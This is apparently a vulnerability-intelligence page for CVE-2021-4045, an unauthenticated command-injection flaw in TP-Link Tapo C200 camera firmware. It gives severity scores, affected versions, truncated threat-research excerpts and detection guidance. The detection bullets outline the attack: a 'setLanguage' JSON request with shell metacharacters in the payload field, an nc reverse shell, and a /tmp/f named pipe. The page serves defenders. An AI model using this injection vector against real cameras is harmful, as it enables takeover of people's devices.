CVE-2021-4045
published 2022-03-10CVE-2021-4045: TP-Link Tapo C200 IP camera, on its 1.1.15 firmware version and below, is affected by an unauthenticated RCE vulnerability, present in the uhttpd binary…
PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
72.84%
99.4th percentile
TP-Link Tapo C200 IP camera, on its 1.1.15 firmware version and below, is affected by an unauthenticated RCE vulnerability, present in the uhttpd binary running by default as root. The exploitation of this vulnerability allows an attacker to take full control of the camera.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tp-link | tapo_c200 | 1.15 – 1.15 | — |
| tp-link | tapo_c200_firmware | <= 1.1.15 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect HTTP POST requests to the root path (/) on port 443 of the camera containing a JSON body with method 'setLanguage' and a params.payload field — this is the exploit trigger for CVE-2021-4045. ↗
- →Alert on shell metacharacter injection (semicolons, pipe characters, single quotes) inside the 'payload' parameter of a setLanguage JSON method call to the camera's HTTPS interface. ↗
- →Monitor for outbound netcat (nc) reverse-shell connections originating from the camera process uhttpd, particularly to attacker-controlled hosts on port 1337. ↗
- →Detect creation of a named pipe at /tmp/f on the camera filesystem, which is a strong indicator of reverse-shell staging activity associated with this exploit. ↗
- →The vulnerable process (uhttpd) runs as root by default; any child process (e.g., /bin/sh) spawned by uhttpd should be treated as a high-severity anomaly. ↗
- ·The exploit uses verify=False (TLS certificate verification disabled), meaning the camera's self-signed certificate will not block exploitation; network-level TLS inspection may not reliably detect this traffic. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-574v-3xxh-gwh5: TP-Link Tapo C200 IP camera, on its 1
ghsa_unreviewed·2022-03-11
CVE-2021-4045 [CRITICAL] CWE-77 GHSA-574v-3xxh-gwh5: TP-Link Tapo C200 IP camera, on its 1
TP-Link Tapo C200 IP camera, on its 1.1.15 firmware version and below, is affected by an unauthenticated RCE vulnerability, present in the uhttpd binary running by default as root. The exploitation of this vulnerability allows an attacker to take full control of the camera.
VulnCheck
TP-Link tapo_c200_firmware Improper Neutralization of Special Elements used in a Command ('Command Injection')
vulncheck·2021·CVSS 9.8
CVE-2021-4045 [CRITICAL] TP-Link tapo_c200_firmware Improper Neutralization of Special Elements used in a Command ('Command Injection')
TP-Link tapo_c200_firmware Improper Neutralization of Special Elements used in a Command ('Command Injection')
TP-Link Tapo C200 IP camera, on its 1.1.15 firmware version and below, is affected by an unauthenticated RCE vulnerability, present in the uhttpd binary running by default as root. The exploitation of this vulnerability allows an attacker to take full control of the camera.
Affected: TP-Link tapo_c200_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign; https://unit42.paloaltonetworks.com/recent-exploits-network-security-trends/
Exploit PoC: http
No detection rules found.
Unit42
Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
blogs_unit42·2022-08-19·CVSS 8.8
CVE-2021-20166 [HIGH] Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
Threat Research Center
Trend Reports
Vulnerabilities
## Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
Yue Guan
Published: August 19, 2022
Trend Reports
Vulnerabilities
Attack analysis
CVE-2021-20166
CVE-2021-20167
CVE-2021-21881
CVE-2021-24762
CVE-2021-28169
CVE-2021-31589
CVE-2021-39226
CVE-2021-4045
CVE-2021-43711
CVE-2022-21371
CVE-2022-21662
CVE-2022-22536
CVE-2022-22947
CVE-2022-22954
CVE-2022-22963
CVE-2022-22965
CVE-2022-24112
CVE-2022-24260
CVE-2022-25060
CVE-2022-25075
CVE-2022-25134
CVE-2022-27226
CVE-2022-29464
Exploit in the wild
Network security trends
## Executive Summary
Recent observations of exploits used in the wild reveal that attackers have been making use
Unit42
Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
blogs_unit42·2022-08-19
Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
## Executive Summary
Recent observations of exploits used in the wild reveal that attackers have been making use of newly published remote code execution vulnerabilities in VMware ONE Access and Identity Manager and Spring Cloud Function, Spring MVC and Spring Web Flux, among others. Attackers have also been taking advantage of a cross-site scripting vulnerability in WordPress core, and SQL injection vulnerabilities in VoIPmonitor GUI and other services. In our observations of network security trends, Unit 42 researchers select exploits of the latest published attacks that defenders should know based on the availability of proofs of concept (PoCs), the severity of the vulnerabilities the exploits are based on and the ease of exploitation.
Other insights that could assist defenders includ
Fortinet
Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai Campaign
blogs_fortinet·2022-04-01·CVSS 9.8
[CRITICAL] Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai Campaign
FORTIGUARD LABS THREAT RESEARCH
Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai Campaign
By Joie Salvio and Roy Tay | April 01, 2022
Between February and March 2022, our FortiGuard Labs team observed that the Beastmode (aka B3astmode) Mirai-based DDoS campaign has aggressively updated its arsenal of exploits. Five new exploits were added within a month, with three targeting various models of TOTOLINK routers.
This inclusion of TOTOLINK exploits is especially noteworthy as they were added just a week after the exploit codes were published on GitHub. We previously reported on the MANGA campaign, which similarly adopted exploit code within weeks of their release.
By rapidly adopting newly released exploit code, threat actors can potentially infect vulnerable devices and expan
arXiv
PETIoT: PEnetration Testing the Internet of Things
arxiv_fulltext·2023-02-09
PETIoT: PEnetration Testing the Internet of Things
1
.001
PETIoT: PEnetration Testing the Internet of Things
Bella et al.
[mode = title]PETIoT: PEnetration Testing the Internet of Things
[1]Giampaolo Bella[orcid=0000-0002-7615-8643]
[email protected]
[1]Dipartimento di Matematica e Informatica, Universit\`a degli Studi di Catania, Catania, Italy
[1]Pietro Biondi[orcid=0000-0003-1795-2836]
[email protected]
[2]Stefano Bognanni[orcid=0000-0001-5843-2031]
[email protected]
[2]Cybersecurity Division, Leonardo S.p.A., Catania, Italy
[3]Sergio Esposito[orcid=0000-0001-9904-9821]
[email protected]
[3]Department of Information Security, Royal Holloway University of London, Egham, UK
## Abstract
Attackers may attempt exploiting Internet of Things (IoT) devices to operate them unduly as well as to gat
http://packetstormsecurity.com/files/168472/TP-Link-Tapo-c200-1.1.15-Remote-Code-Execution.htmlhttps://www.incibe-cert.es/en/early-warning/security-advisories/tp-link-tapo-c200-remote-code-execution-vulnerabilityhttp://packetstormsecurity.com/files/168472/TP-Link-Tapo-c200-1.1.15-Remote-Code-Execution.htmlhttps://www.incibe-cert.es/en/early-warning/security-advisories/tp-link-tapo-c200-remote-code-execution-vulnerability
2022-03-10
Published
Exploited in the wild